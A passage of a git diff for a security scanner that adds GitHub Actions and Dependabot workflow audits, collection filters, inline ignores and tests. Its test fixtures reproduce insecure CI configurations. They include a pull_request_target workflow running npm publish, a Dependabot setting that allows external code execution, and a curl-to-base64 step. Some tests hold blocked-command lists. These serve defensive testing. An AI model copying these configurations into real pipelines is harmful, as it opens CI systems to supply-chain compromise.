region.startColumn = input.location.column; } return { physicalLocation: { artifactLocation: { - uri: finding.file_path, + uri: input.filePath, }, region: Object.keys(region).length > 0 ? region : undefined, }, }; } +function findingToRelatedLocations(finding: Finding): SarifLocation[] | undefined { + const related = finding.affected_locations ?? []; + if (related.length === 0) { + return undefined; + } + + const locations = related.map((location) => + locationToSarif({ + filePath: location.file_path, + location: location.location, + }), + ); + + return locations.length > 0 ? locations : undefined; +} + function buildRules(findings: Finding[]): SarifRule[] { const byRuleId = new Map(); @@ -109,6 +139,7 @@ function findingToResult(finding: Finding): SarifResult { level: toSarifLevel(finding.severity), message: { text: finding.description }, locations: [findingToLocation(finding)], + relatedLocations: findingToRelatedLocations(finding), properties: { finding_id: finding.finding_id, fingerprint: finding.fingerprint ?? null, diff --git a/src/reporter/terminal.ts b/src/reporter/terminal.ts index dc61d6a..67341b4 100644 --- a/src/reporter/terminal.ts +++ b/src/reporter/terminal.ts @@ -116,6 +116,18 @@ function appendFinding( if (formattedLocation) { lines.push(` Location: ${formattedLocation}`); } + if ((finding.affected_locations?.length ?? 0) > 0) { + lines.push(" Affected locations:"); + for (const location of finding.affected_locations ?? []) { + const path = toAbsoluteDisplayPath(report.scan_target, location.file_path); + const locationText = formatLocation({ + field: location.location?.field, + line: location.location?.line, + column: location.location?.column, + }); + lines.push(` - ${path}${locationText ? ` (${locationText})` : ""}`); + } + } if (finding.cve) { lines.push(` CVE: ${finding.cve}`); } diff --git a/src/scan.ts b/src/scan.ts index 58139de..2ef1e15 100644 --- a/src/scan.ts +++ b/src/scan.ts @@ -1,6 +1,6 @@ import { existsSync, readdirSync, readFileSync, statSync } from "node:fs"; import { homedir } from "node:os"; -import { join, relative, resolve, sep } from "node:path"; +import { basename, join, relative, resolve, sep } from "node:path"; import { collectLocalTextAnalysisTargets, type LocalTextAnalysisTarget, @@ -25,10 +25,15 @@ import { loadScanState, saveScanState, } from "./layer2-static/state/scan-state.js"; +import { + applyInlineIgnoreDirectives, + collectInlineIgnoreDirectives, +} from "./config/inline-ignore.js"; +import { isGitHubDependabotPath } from "./layer2-static/dependabot/parser.js"; import type { DiscoveryFormat } from "./types/discovery.js"; import type { Finding } from "./types/finding.js"; import type { CodeGateReport } from "./types/report.js"; -import type { CodeGateConfig } from "./config.js"; +import type { CodeGateConfig, ScanCollectionKind, ScanCollectionMode } from "./config.js"; import type { DeepScanResource } from "./pipeline.js"; interface CandidatePattern { @@ -56,11 +61,15 @@ export interface ScanEngineInput { export interface DeepScanDiscoveryOptions { includeUserScope?: boolean; homeDir?: string; + collectModes?: ScanCollectionMode[]; + collectKinds?: ScanCollectionKind[]; } export interface ScanSurfaceOptions { includeUserScope?: boolean; homeDir?: string; + collectModes?: ScanCollectionMode[]; + collectKinds?: ScanCollectionKind[]; } export interface ScanDiscoveryCandidate { @@ -88,6 +97,8 @@ export interface ScanDiscoveryContextOptions { homeDir?: string; parseSelected?: boolean; explicitCandidates?: ScanDiscoveryCandidate[]; + collectModes?: ScanCollectionMode[]; + collectKinds?: ScanCollectionKind[]; } const INFERRED_ARTIFACT_RULES: Array<{ @@ -95,6 +106,21 @@ const INFERRED_ARTIFACT_RULES: Array<{ format: DiscoveryFormat; tool: string; }> = [ + { + pattern: /(?:^|\/)\.github\/workflows\/[^/]+\.ya?ml$/iu, + format: "yaml", + tool: "github-actions", + }, + { + pattern: /(?:^|\/)\.github\/dependabot\.ya?ml$/iu, + format: "yaml", + tool: "dependabot", + }, + { + pattern: /(?:^|\/)action\.ya?ml$/iu, + format: "yaml", + tool: "github-actions", + }, { pattern: /(?:^|\/)agents\.md$/iu, format: "markdown", tool: "claude-code" }, { pattern: /(?:^|\/)claude\.md$/iu, format: "markdown", tool: "claude-code" }, { pattern: /(?:^|\/)codex\.md$/iu, format: "markdown", tool: "codex-cli" }, @@ -122,6 +148,16 @@ function normalizePathForMatch(path: string): string { return path.split(sep).join("/"); } +function normalizeCollectionKinds( + input: ScanCollectionKind[] | undefined, +): Set | undefined { + if (!input || input.length === 0) { + return undefined; + } + + return new Set(input); +} + function normalizeUserScopePattern(pattern: string): string { return normalizePathForMatch(pattern).replace(/^~\//u, "").replace(/^\/+/u, ""); } @@ -153,6 +189,40 @@ function gatherCandidatePatterns(kb: KnowledgeBaseLoadResult): CandidatePattern[ return candidates; } +function isWorkflowCollectionCandidate(reportPath: string): boolean { + return /(?:^|\/)\.github\/workflows\/[^/]+\.ya?ml$/iu.test(normalizePathForMatch(reportPath)); +} + +function isActionCollectionCandidate(reportPath: string): boolean { + const fileName = basename(normalizePathForMatch(reportPath)).toLowerCase(); + return fileName === "action.yml" || fileName === "action.yaml"; +} + +function inferCollectionKind(reportPath: string): ScanCollectionKind | null { + if (isWorkflowCollectionCandidate(reportPath)) { + return "workflows"; + } + if (isActionCollectionCandidate(reportPath)) { + return "actions"; + } + if (isGitHubDependabotPath(reportPath)) { + return "dependabot"; + } + return null; +} + +function matchesCollectionKinds( + reportPath: string, + collectKinds: Set | undefined, +): boolean { + if (!collectKinds) { + return true; + } + + const kind = inferCollectionKind(reportPath); + return kind !== null && collectKinds.has(kind); +} + function isRegularFile(path: string): boolean { try { return statSync(path).isFile(); @@ -261,9 +331,21 @@ function collectSelectedCandidates( absoluteTarget: string, walkedFiles: string[], patterns: CandidatePattern[], - options: { includeUserScope: boolean; homeDir: string }, + options: { + includeUserScope: boolean; + homeDir: string; + collectModes: Set; + collectKinds?: Set; + }, ): ScanDiscoveryCandidate[] { const selected = new Map(); + const includeAll = options.collectModes.has("all"); + const includeProject = + includeAll || options.collectModes.has("default") || options.collectModes.has("project"); + const includeUser = + includeAll || + options.collectModes.has("user") || + (options.collectModes.has("default") && options.includeUserScope); const filesByRelativePath = walkedFiles .map((filePath) => ({ @@ -273,6 +355,9 @@ function collectSelectedCandidates( .filter((entry) => !entry.relativePath.startsWith("..")); for (const file of filesByRelativePath) { + if (!includeProject) { + continue; + } for (const candidate of patterns) { if (candidate.scope !== "project") { continue; @@ -280,6 +365,9 @@ function collectSelectedCandidates( if (!wildcardToRegex(candidate.pattern).test(file.relativePath)) { continue; } + if (!matchesCollectionKinds(file.relativePath, options.collectKinds)) { + continue; + } if (!selected.has(file.relativePath)) { selected.set(file.relativePath, { reportPath: file.relativePath, @@ -291,8 +379,14 @@ function collectSelectedCandidates( } } - if (!options.includeUserScope) { + if (!includeUser) { for (const file of filesByRelativePath) { + if (!includeProject) { + continue; + } + if (!matchesCollectionKinds(file.relativePath, options.collectKinds)) { + continue; + } if (selected.has(file.relativePath)) { continue; } @@ -308,41 +402,55 @@ function collectSelectedCandidates( return Array.from(selected.values()); } - for (const candidate of patterns) { - if (candidate.scope !== "user") { - continue; - } - const userPattern = normalizeUserScopePattern(candidate.pattern); - if (userPattern.includes("*")) { - for (const match of collectUserScopeWildcardMatches(options.homeDir, userPattern)) { - const reportPath = toUserReportPath(match.relativePath); - if (!selected.has(reportPath)) { - selected.set(reportPath, { - reportPath, - absolutePath: match.absolutePath, - format: candidate.format, - tool: candidate.tool, - }); + if (includeUser) { + for (const candidate of patterns) { + if (candidate.scope !== "user") { + continue; + } + const userPattern = normalizeUserScopePattern(candidate.pattern); + if (userPattern.includes("*")) { + for (const match of collectUserScopeWildcardMatches(options.homeDir, userPattern)) { + const reportPath = toUserReportPath(match.relativePath); + if (!matchesCollectionKinds(reportPath, options.collectKinds)) { + continue; + } + if (!selected.has(reportPath)) { + selected.set(reportPath, { + reportPath, + absolutePath: match.absolutePath, + format: candidate.format, + tool: candidate.tool, + }); + } } + continue; + } + const absolutePath = resolve(options.homeDir, userPattern); + if (!existsSync(absolutePath) || !isRegularFile(absolutePath)) { + continue; + } + const reportPath = toUserReportPath(userPattern); + if (!matchesCollectionKinds(reportPath, options.collectKinds)) { + continue; + } + if (!selected.has(reportPath)) { + selected.set(reportPath, { + reportPath, + absolutePath, + format: candidate.format, + tool: candidate.tool, + }); } - continue; - } - const absolutePath = resolve(options.homeDir, userPattern); - if (!existsSync(absolutePath) || !isRegularFile(absolutePath)) { - continue; - } - const reportPath = toUserReportPath(userPattern); - if (!selected.has(reportPath)) { - selected.set(reportPath, { - reportPath, - absolutePath, - format: candidate.format, - tool: candidate.tool, - }); } } for (const file of filesByRelativePath) { + if (!includeProject && !includeAll) { + continue; + } + if (!matchesCollectionKinds(file.relativePath, options.collectKinds)) { + continue; + } if (selected.has(file.relativePath)) { continue; } @@ -358,9 +466,23 @@ function collectSelectedCandidates( return Array.from(selected.values()); } +function normalizeCollectionModes( + input: ScanCollectionMode[] | undefined, +): Set { + const normalized = new Set(); + for (const mode of input ?? []) { + normalized.add(mode); + } + if (normalized.size === 0) { + normalized.add("default"); + } + return normalized; +} + function mergeExplicitCandidates( selected: ScanDiscoveryCandidate[], explicitCandidates: ScanDiscoveryCandidate[] | undefined, + collectKinds?: Set, ): ScanDiscoveryCandidate[] { if (!explicitCandidates || explicitCandidates.length === 0) { return selected; @@ -371,6 +493,9 @@ function mergeExplicitCandidates( merged.set(candidate.reportPath, candidate); } for (const candidate of explicitCandidates) { + if (!matchesCollectionKinds(candidate.reportPath, collectKinds)) { + continue; + } merged.set(candidate.reportPath, candidate); } return Array.from(merged.values()); @@ -415,11 +540,16 @@ function ensureParsedCandidates(context: ScanDiscoveryContext): ParsedScanDiscov return context.parsedCandidates; } -function makeParseErrorFinding(filePath: string, tool: string, message: string): Finding { +function makeParseErrorFinding( + filePath: string, + tool: string, + message: string, + strictCollection: boolean, +): Finding { return { rule_id: "parse-error", finding_id: `PARSE_ERROR-${filePath}`, - severity: "LOW", + severity: strictCollection ? "HIGH" : "LOW", category: "PARSE_ERROR", layer: "L1", file_path: filePath, @@ -633,6 +763,8 @@ export function discoverDeepScanResources( const context = createScanDiscoveryContext(scanTarget, kbInput, { includeUserScope: options.includeUserScope, homeDir: options.homeDir, + collectModes: options.collectModes, + collectKinds: options.collectKinds, parseSelected: true, }); return discoverDeepScanResourcesFromContext(context); @@ -652,12 +784,20 @@ export function createScanDiscoveryContext( const kb = kbInput ?? loadKnowledgeBase(); const patterns = gatherCandidatePatterns(kb); const walked = walkProjectTree(absoluteTarget); + const collectModes = normalizeCollectionModes(options.collectModes); + const collectKinds = normalizeCollectionKinds(options.collectKinds); + const explicitOnly = collectModes.size === 1 && collectModes.has("explicit"); const selected = mergeExplicitCandidates( - collectSelectedCandidates(absoluteTarget, walked.files, patterns, { - includeUserScope: options.includeUserScope === true, - homeDir: resolve(options.homeDir ?? homedir()), - }), + explicitOnly + ? [] + : collectSelectedCandidates(absoluteTarget, walked.files, patterns, { + includeUserScope: options.includeUserScope === true, + homeDir: resolve(options.homeDir ?? homedir()), + collectModes, + collectKinds, + }), options.explicitCandidates, + collectKinds, ); return { @@ -691,6 +831,8 @@ export function collectScanSurface( const context = createScanDiscoveryContext(scanTarget, kbInput, { includeUserScope: options.includeUserScope === true, homeDir: options.homeDir, + collectModes: options.collectModes, + collectKinds: options.collectKinds, }); const surface = new Set(context.walked.files); @@ -719,6 +861,8 @@ export async function runScanEngine(input: ScanEngineInput): Promise ({ + filePath: file.filePath, + textContent: file.textContent, + })), + ); + const findings = applyInlineIgnoreDirectives( + [...report.findings, ...parseErrors, ...stateResult.findings], + inlineIgnores, + ); return applyReportSummary({ ...report, findings, diff --git a/src/types/finding.ts b/src/types/finding.ts index d5024c1..9ef0955 100644 --- a/src/types/finding.ts +++ b/src/types/finding.ts @@ -14,6 +14,11 @@ export const FINDING_CATEGORIES = [ "CONFIG_CHANGE", "NEW_SERVER", "TOXIC_FLOW", + "CI_SUPPLY_CHAIN", + "CI_TRIGGER", + "CI_PERMISSIONS", + "CI_TEMPLATE_INJECTION", + "CI_VULNERABLE_ACTION", ] as const; export type FindingCategory = (typeof FINDING_CATEGORIES)[number]; diff --git a/test-fixtures/workflow-audits/real-cases/RC-01-bot-conditions/.github/workflows/claude-dependabot.yml b/test-fixtures/workflow-audits/real-cases/RC-01-bot-conditions/.github/workflows/claude-dependabot.yml new file mode 100644 index 0000000..991ba4b --- /dev/null +++ b/test-fixtures/workflow-audits/real-cases/RC-01-bot-conditions/.github/workflows/claude-dependabot.yml @@ -0,0 +1,11 @@ +# Source: https://github.com/Significant-Gravitas/AutoGPT/blob/0f67e45d05c855077236f739ca3a02fa95fc7e96/.github/workflows/claude-dependabot.yml +name: claude-dependabot +on: pull_request_target + +jobs: + claude-review: + runs-on: ubuntu-latest + if: github.actor == 'dependabot[bot]' + steps: + - uses: actions/checkout@v4 + - run: npm publish diff --git a/test-fixtures/workflow-audits/real-cases/RC-02-obfuscation/.github/workflows/pipeline-electron-lint.yml b/test-fixtures/workflow-audits/real-cases/RC-02-obfuscation/.github/workflows/pipeline-electron-lint.yml new file mode 100644 index 0000000..47da422 --- /dev/null +++ b/test-fixtures/workflow-audits/real-cases/RC-02-obfuscation/.github/workflows/pipeline-electron-lint.yml @@ -0,0 +1,12 @@ +# Source: https://github.com/electron/electron/blob/6df6ec5f094f1546b5510c47aa478b2e19187f88/.github/workflows/pipeline-electron-lint.yml +name: lint +on: [pull_request] + +jobs: + lint: + runs-on: ubuntu-latest + steps: + - run: | + chromium_revision="$(grep -A1 chromium_version src/electron/DEPS | tr -d '\n' | cut -d\' -f4)" + gn_version="$(curl -sL -b ~/.gitcookies \"https://chromium.googlesource.com/chromium/src/+/${chromium_revision}/DEPS?format=TEXT\" | base64 -d | grep gn_version | head -n1 | cut -d\' -f4)" + echo "$gn_version" diff --git a/test-fixtures/workflow-audits/real-cases/RC-03-concurrency-limits/.github/workflows/label.yml b/test-fixtures/workflow-audits/real-cases/RC-03-concurrency-limits/.github/workflows/label.yml new file mode 100644 index 0000000..376f5ae --- /dev/null +++ b/test-fixtures/workflow-audits/real-cases/RC-03-concurrency-limits/.github/workflows/label.yml @@ -0,0 +1,10 @@ +# Source: https://github.com/electricitymaps/electricitymaps-contrib/blob/7d22bea77bd73a9bcc8c7e6fe78a973713ba8637/.github/workflows/label.yml +name: Label PR +on: [pull_request_target] + +jobs: + label: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - run: echo "label" diff --git a/test-fixtures/workflow-audits/real-cases/RC-04-dependabot-execution/.github/dependabot.yml b/test-fixtures/workflow-audits/real-cases/RC-04-dependabot-execution/.github/dependabot.yml new file mode 100644 index 0000000..3e1e4da --- /dev/null +++ b/test-fixtures/workflow-audits/real-cases/RC-04-dependabot-execution/.github/dependabot.yml @@ -0,0 +1,8 @@ +# Source: https://github.com/RoleModel/rolemodel_rails/blob/83f8c13518afd1137405b81fc4723e202f833368/lib/generators/rolemodel/github/templates/dependabot.yml +version: 2 +updates: + - package-ecosystem: bundler + directory: "/" + insecure-external-code-execution: allow + schedule: + interval: weekly diff --git a/test-fixtures/workflow-audits/real-cases/index.json b/test-fixtures/workflow-audits/real-cases/index.json new file mode 100644 index 0000000..2db2c98 --- /dev/null +++ b/test-fixtures/workflow-audits/real-cases/index.json @@ -0,0 +1,26 @@ +[ + { + "id": "RC-01-bot-conditions", + "target": "RC-01-bot-conditions", + "expected_rule": "bot-conditions", + "source": "https://github.com/Significant-Gravitas/AutoGPT/blob/0f67e45d05c855077236f739ca3a02fa95fc7e96/.github/workflows/claude-dependabot.yml" + }, + { + "id": "RC-02-obfuscation", + "target": "RC-02-obfuscation", + "expected_rule": "workflow-obfuscation", + "source": "https://github.com/electron/electron/blob/6df6ec5f094f1546b5510c47aa478b2e19187f88/.github/workflows/pipeline-electron-lint.yml" + }, + { + "id": "RC-03-concurrency-limits", + "target": "RC-03-concurrency-limits", + "expected_rule": "workflow-concurrency-limits", + "source": "https://github.com/electricitymaps/electricitymaps-contrib/blob/7d22bea77bd73a9bcc8c7e6fe78a973713ba8637/.github/workflows/label.yml" + }, + { + "id": "RC-04-dependabot-execution", + "target": "RC-04-dependabot-execution", + "expected_rule": "dependabot-execution", + "source": "https://github.com/RoleModel/rolemodel_rails/blob/83f8c13518afd1137405b81fc4723e202f833368/lib/generators/rolemodel/github/templates/dependabot.yml" + } +] diff --git a/tests/cli/help-examples.test.ts b/tests/cli/help-examples.test.ts index fed0480..3b9cea1 100644 --- a/tests/cli/help-examples.test.ts +++ b/tests/cli/help-examples.test.ts @@ -44,6 +44,13 @@ describe("cli help examples", () => { expect(help).toContain("codegate scan ."); expect(help).toContain("codegate scan ./skills/security-review/SKILL.md"); expect(help).toContain("codegate scan https://github.com/owner/repo"); + expect(help).toContain("--workflow-audits"); + expect(help).toContain("--collect "); + expect(help).toContain("--persona "); + expect(help).toContain("--runtime-mode "); + expect(help).toContain( + "codegate scan . --workflow-audits --collect project --persona auditor --runtime-mode online", + ); expect(help).toContain( "codegate scan https://github.com/owner/repo/blob/main/skills/security-review/SKILL.md", ); diff --git a/tests/cli/scan-command.test.ts b/tests/cli/scan-command.test.ts index 4ede0e3..e33f809 100644 --- a/tests/cli/scan-command.test.ts +++ b/tests/cli/scan-command.test.ts @@ -72,6 +72,11 @@ function buildDeps(overrides: Partial): CliDeps { check_ide_settings: true, owasp_mapping: true, trusted_api_domains: [], + strict_collection: false, + scan_collection_modes: ["default"], + persona: "regular", + runtime_mode: "offline", + workflow_audits: { enabled: false }, suppress_findings: [], }), runScan: async () => makeReport([]), @@ -232,4 +237,63 @@ describe("task 16 scan command", () => { await runScanCommand(deps, ["."]); expect(receivedConfig?.scan_user_scope).toBe(true); }); + + it("passes collection and strict flags into effective scan config", async () => { + let receivedConfig: + | { + strict_collection?: boolean; + scan_collection_modes?: string[]; + } + | undefined; + + const deps = buildDeps({ + resolveConfig: () => ({ + ...DEFAULT_CONFIG, + }), + runScan: async (input) => { + receivedConfig = input.config; + return makeReport([]); + }, + }); + + await runScanCommand(deps, [ + ".", + "--collect", + "project", + "--collect", + "explicit", + "--strict-collection", + ]); + + expect(receivedConfig?.strict_collection).toBe(true); + expect(receivedConfig?.scan_collection_modes).toEqual(["project", "explicit"]); + }); + + it("passes collection kind filters into effective scan config", async () => { + let receivedConfig: + | { + scan_collection_kinds?: string[]; + } + | undefined; + + const deps = buildDeps({ + resolveConfig: () => ({ + ...DEFAULT_CONFIG, + }), + runScan: async (input) => { + receivedConfig = input.config; + return makeReport([]); + }, + }); + + await runScanCommand(deps, [ + ".", + "--collect-kind", + "workflows", + "--collect-kind", + "dependabot", + ]); + + expect(receivedConfig?.scan_collection_kinds).toEqual(["workflows", "dependabot"]); + }); }); diff --git a/tests/cli/workflow-audit-command.test.ts b/tests/cli/workflow-audit-command.test.ts new file mode 100644 index 0000000..b22e2ce --- /dev/null +++ b/tests/cli/workflow-audit-command.test.ts @@ -0,0 +1,90 @@ +import { describe, expect, it } from "vitest"; +import { createCli, type CliDeps } from "../../src/cli"; +import type { CodeGateReport } from "../../src/types/report"; + +const EMPTY_REPORT: CodeGateReport = { + version: "0.1.0", + scan_target: ".", + timestamp: "2026-03-23T00:00:00.000Z", + kb_version: "2026-03-23", + tools_detected: ["github-actions"], + findings: [], + summary: { + total: 0, + by_severity: { CRITICAL: 0, HIGH: 0, MEDIUM: 0, LOW: 0, INFO: 0 }, + fixable: 0, + suppressed: 0, + exit_code: 0, + }, +}; + +function buildDeps(overrides: Partial = {}): CliDeps { + return { + cwd: () => process.cwd(), + isTTY: () => false, + resolveConfig: () => ({ + severity_threshold: "high", + auto_proceed_below_threshold: true, + output_format: "terminal", + scan_user_scope: false, + strict_collection: false, + scan_collection_modes: ["default"], + persona: "regular", + runtime_mode: "offline", + workflow_audits: { enabled: false }, + tui: { enabled: false, colour_scheme: "default", compact_mode: false }, + tool_discovery: { preferred_agent: "claude", agent_paths: {}, skip_tools: [] }, + trusted_directories: [], + blocked_commands: ["bash", "sh"], + known_safe_mcp_servers: [], + known_safe_formatters: [], + known_safe_lsp_servers: [], + known_safe_hooks: [], + unicode_analysis: true, + check_ide_settings: true, + owasp_mapping: true, + trusted_api_domains: [], + suppress_findings: [], + suppression_rules: [], + }), + runScan: async () => EMPTY_REPORT, + stdout: () => {}, + stderr: () => {}, + writeFile: () => {}, + setExitCode: () => {}, + ...overrides, + }; +} + +describe("workflow audit cli options", () => { + it("forwards workflow audit scan options into config", async () => { + let captured: CliDeps extends { runScan: (input: infer T) => Promise } ? T : never; + + const deps = buildDeps({ + runScan: async (input) => { + captured = input as typeof captured; + return EMPTY_REPORT; + }, + }); + + const cli = createCli("0.1.0", deps); + await cli.parseAsync([ + "node", + "codegate", + "scan", + ".", + "--workflow-audits", + "--collect", + "project", + "--persona", + "auditor", + "--runtime-mode", + "online", + ]); + + expect(captured?.config.workflow_audits?.enabled).toBe(true); + expect(captured?.config.scan_collection_modes).toEqual(["project"]); + expect(captured?.config.persona).toBe("auditor"); + expect(captured?.config.runtime_mode).toBe("online"); + }); +}); diff --git a/tests/config/config-precedence.test.ts b/tests/config/config-precedence.test.ts index d43ca8f..d6003b2 100644 --- a/tests/config/config-precedence.test.ts +++ b/tests/config/config-precedence.test.ts @@ -47,6 +47,24 @@ describe("task 16 config precedence", () => { trusted_api_domains: ["proxy.example.com"], trusted_directories: ["/safe/from-global"], scan_user_scope: false, + strict_collection: true, + scan_collection_modes: ["project"], + persona: "pedantic", + runtime_mode: "online", + workflow_audits: { enabled: true }, + rules: { + "workflow-unpinned-uses": { + disable: true, + ignore: ["global.yml", ".github/workflows/legacy.yml:12:3"], + config: { + shared: "global", + globalOnly: true, + }, + }, + "workflow-dangerous-triggers": { + ignore: ["global-triggers.yml:4"], + }, + }, }, null, 2, @@ -68,6 +86,27 @@ describe("task 16 config precedence", () => { trusted_api_domains: ["project.internal"], trusted_directories: ["/unsafe/project-attempt"], scan_user_scope: true, + strict_collection: false, + scan_collection_modes: ["user", "explicit"], + persona: "auditor", + runtime_mode: "offline", + workflow_audits: { enabled: false }, + rules: { + "workflow-unpinned-uses": { + disable: false, + ignore: [".github/workflows/project.yml:2:9"], + config: { + shared: "project", + projectOnly: true, + }, + }, + "workflow-template-injection": { + disable: true, + config: { + projectOnly: true, + }, + }, + }, }, null, 2, @@ -97,6 +136,28 @@ describe("task 16 config precedence", () => { ); expect(effective.trusted_directories).toEqual(["/safe/from-global"]); expect(effective.scan_user_scope).toBe(true); + expect(effective.strict_collection).toBe(false); + expect(effective.scan_collection_modes).toEqual(["user", "explicit"]); + expect(effective.persona).toBe("auditor"); + expect(effective.runtime_mode).toBe("offline"); + expect(effective.workflow_audits?.enabled).toBe(false); + expect(effective.rules?.["workflow-unpinned-uses"]?.disable).toBe(false); + expect(effective.rules?.["workflow-unpinned-uses"]?.ignore).toEqual( + expect.arrayContaining([ + "global.yml", + ".github/workflows/legacy.yml:12:3", + ".github/workflows/project.yml:2:9", + ]), + ); + expect(effective.rules?.["workflow-unpinned-uses"]?.config).toMatchObject({ + shared: "project", + globalOnly: true, + projectOnly: true, + }); + expect(effective.rules?.["workflow-dangerous-triggers"]?.ignore).toEqual([ + "global-triggers.yml:4", + ]); + expect(effective.rules?.["workflow-template-injection"]?.disable).toBe(true); expect(effective.blocked_commands).toEqual( expect.arrayContaining(["bash", "curl", "python3", "echo"]), ); @@ -116,5 +177,11 @@ describe("task 16 config precedence", () => { }); expect(effective.scan_user_scope).toBe(true); + expect(effective.strict_collection).toBe(false); + expect(effective.scan_collection_modes).toEqual(["default"]); + expect(effective.persona).toBe("regular"); + expect(effective.runtime_mode).toBe("offline"); + expect(effective.workflow_audits?.enabled).toBe(false); + expect(effective.rules).toBeUndefined(); }); }); diff --git a/tests/config/inline-ignore.test.ts b/tests/config/inline-ignore.test.ts new file mode 100644 index 0000000..cab3873 --- /dev/null +++ b/tests/config/inline-ignore.test.ts @@ -0,0 +1,73 @@ +import { describe, expect, it } from "vitest"; +import { + applyInlineIgnoreDirectives, + collectInlineIgnoreDirectives, +} from "../../src/config/inline-ignore"; +import type { Finding } from "../../src/types/finding"; + +function makeFinding(overrides: Partial = {}): Finding { + return { + rule_id: "workflow-unpinned-uses", + finding_id: "WORKFLOW_UNPINNED_USES-.github/workflows/ci.yml-0-0", + severity: "HIGH", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: ".github/workflows/ci.yml", + location: { field: "jobs.test.steps[0].uses", line: 2, column: 3 }, + description: "test", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-829", + confidence: "HIGH", + fixable: false, + remediation_actions: [], + suppressed: false, + ...overrides, + }; +} + +describe("inline ignore directives", () => { + it("collects yaml and markdown ignore directives", () => { + const directives = collectInlineIgnoreDirectives([ + { + filePath: ".github/workflows/ci.yml", + textContent: "# codegate: ignore[workflow-unpinned-uses]", + }, + { + filePath: "skills/security-review/SKILL.md", + textContent: "", + }, + ]); + + expect(directives.get(".github/workflows/ci.yml")?.rules.has("workflow-unpinned-uses")).toBe( + true, + ); + expect( + directives.get("skills/security-review/SKILL.md")?.rules.has("rule-file-remote-shell"), + ).toBe(true); + }); + + it("suppresses findings when an inline ignore matches rule and file", () => { + const directives = collectInlineIgnoreDirectives([ + { + filePath: ".github/workflows/ci.yml", + textContent: "# codegate: ignore[workflow-unpinned-uses]", + }, + ]); + + const [suppressed, active] = applyInlineIgnoreDirectives( + [ + makeFinding(), + makeFinding({ + rule_id: "workflow-dangerous-triggers", + finding_id: "WORKFLOW_DANGEROUS_TRIGGERS-.github/workflows/ci.yml", + }), + ], + directives, + ); + + expect(suppressed?.suppressed).toBe(true); + expect(active?.suppressed).toBe(false); + }); +}); diff --git a/tests/config/suppression-policy.test.ts b/tests/config/suppression-policy.test.ts index e433fea..eb44e0e 100644 --- a/tests/config/suppression-policy.test.ts +++ b/tests/config/suppression-policy.test.ts @@ -72,4 +72,68 @@ describe("suppression policy", () => { expect(suppressed?.suppressed).toBe(true); expect(active?.suppressed).toBe(false); }); + + it("supports coordinate-based suppression matching", () => { + const [suppressed, active] = applySuppressionPolicy( + [ + makeFinding({ + location: { field: "env.OPENAI_BASE_URL", line: 42, column: 7 }, + }), + makeFinding({ + location: { field: "env.OPENAI_BASE_URL", line: 11, column: 3 }, + }), + ], + { + suppress_findings: [], + suppression_rules: [ + { + rule_id: "env-base-url-override", + location: "packages/app/.mcp.json:42:7", + }, + ], + }, + ); + + expect(suppressed?.suppressed).toBe(true); + expect(active?.suppressed).toBe(false); + }); + + it("suppresses findings when a rule is disabled or ignored by rule policy", () => { + const [disabled, ignored, active] = applySuppressionPolicy( + [ + makeFinding({ + rule_id: "workflow-dangerous-triggers", + finding_id: "WORKFLOW_DANGEROUS_TRIGGERS-.github/workflows/ci.yml", + file_path: ".github/workflows/ci.yml", + location: { field: "on", line: 4, column: 2 }, + }), + makeFinding({ + rule_id: "workflow-unpinned-uses", + finding_id: "WORKFLOW_UNPINNED_USES-.github/workflows/ci.yml-0-0", + file_path: ".github/workflows/ci.yml", + location: { field: "jobs.build.steps[0].uses", line: 12, column: 7 }, + }), + makeFinding({ + rule_id: "workflow-unpinned-uses", + finding_id: "WORKFLOW_UNPINNED_USES-.github/workflows/ci.yml-0-1", + file_path: ".github/workflows/ci.yml", + location: { field: "jobs.build.steps[1].uses", line: 18, column: 7 }, + }), + ], + { + suppress_findings: [], + suppression_rules: [], + rule_policies: { + "workflow-dangerous-triggers": { disable: true }, + "workflow-unpinned-uses": { + ignore: [".github/workflows/ci.yml:12:7"], + }, + }, + }, + ); + + expect(disabled?.suppressed).toBe(true); + expect(ignored?.suppressed).toBe(true); + expect(active?.suppressed).toBe(false); + }); }); diff --git a/tests/fixtures/fixtures.test.ts b/tests/fixtures/fixtures.test.ts index c767f0b..4c73a69 100644 --- a/tests/fixtures/fixtures.test.ts +++ b/tests/fixtures/fixtures.test.ts @@ -33,4 +33,24 @@ describe("task 06 fixture corpus", () => { expect(existsSync(resolve(root, "remediation/.mcp.json"))).toBe(true); expect(read("remediation/.mcp.json")).toContain("OPENAI_BASE_URL"); }); + + it("contains workflow audit real-case fixtures with source index", () => { + expect(existsSync(resolve(root, "workflow-audits/real-cases/index.json"))).toBe(true); + expect( + existsSync( + resolve( + root, + "workflow-audits/real-cases/RC-01-bot-conditions/.github/workflows/claude-dependabot.yml", + ), + ), + ).toBe(true); + expect( + existsSync( + resolve( + root, + "workflow-audits/real-cases/RC-04-dependabot-execution/.github/dependabot.yml", + ), + ), + ).toBe(true); + }); }); diff --git a/tests/layer1/artifact-candidate-discovery.test.ts b/tests/layer1/artifact-candidate-discovery.test.ts index 3eb1a1c..1eaab15 100644 --- a/tests/layer1/artifact-candidate-discovery.test.ts +++ b/tests/layer1/artifact-candidate-discovery.test.ts @@ -156,4 +156,90 @@ describe("artifact candidate discovery", () => { ), ).toBe(true); }); + + it("honors explicit-only collection mode", () => { + const root = mkdtempSync(join(tmpdir(), "codegate-artifact-explicit-only-")); + mkdirSync(join(root, "skills", "security-review"), { recursive: true }); + writeFileSync(join(root, "skills", "security-review", "SKILL.md"), "hidden payload\n", "utf8"); + writeFileSync(join(root, "only-this.md"), "# explicit\n", "utf8"); + + const context = createScanDiscoveryContext(root, undefined, { + parseSelected: true, + collectModes: ["explicit"], + explicitCandidates: [ + { + reportPath: "only-this.md", + absolutePath: join(root, "only-this.md"), + format: "markdown", + tool: "codex-cli", + }, + ], + }); + + expect(context.selected.map((candidate) => normalizeSlashes(candidate.reportPath))).toEqual([ + "only-this.md", + ]); + }); + + it("filters discovery candidates by collection kind", () => { + const root = mkdtempSync(join(tmpdir(), "codegate-artifact-collection-kind-")); + const workflowPath = join(root, ".github", "workflows", "build.yml"); + const actionPath = join(root, "action.yml"); + const dependabotPath = join(root, ".github", "dependabot.yml"); + + mkdirSync(join(root, ".github", "workflows"), { recursive: true }); + writeFileSync(workflowPath, "name: ci\n", "utf8"); + writeFileSync(actionPath, "name: demo\nruns:\n using: composite\n", "utf8"); + writeFileSync(dependabotPath, "version: 